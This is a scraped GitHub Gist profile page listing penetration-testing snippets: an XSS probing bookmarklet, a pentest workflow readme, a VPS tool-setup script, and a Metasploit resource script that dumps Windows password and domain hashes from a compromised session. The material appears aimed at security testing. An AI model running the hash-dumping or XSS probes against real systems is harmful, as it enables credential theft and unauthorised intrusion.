Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

Jineeshak

🎯
Focusing
Block or report user

Report or block Jineeshak

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Jineeshak
Jineeshak / XSSbookmarklet.js
Created Jan 10, 2018 — forked from Rhynorater/XSSbookmarklet.js
XSS Discovery Bookmarklet
View XSSbookmarklet.js
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()
@Jineeshak
Jineeshak / offsec.md
Created Oct 21, 2017 — forked from trietptm/offsec.md
Penetrating Testing/Assessment Workflow
View offsec.md

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@Jineeshak
Jineeshak / prep-vps.sh
Created Oct 18, 2017
Download tools and configure settings for new VPSes and VMs.
View prep-vps.sh
#!/bin/bash
# Update OS
apt-get update
apt-get upgrade -y
apt-get dist-upgrade -y
# Pip
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
rm get-pip.py
@Jineeshak
Jineeshak / offsec.md
Created Oct 18, 2017 — forked from jivoi/offsec.md
Penetrating Testing/Assessment Workflow
View offsec.md

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

View metasploit-post-exploitation-script-for-windows.rc
setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
You can’t perform that action at this time.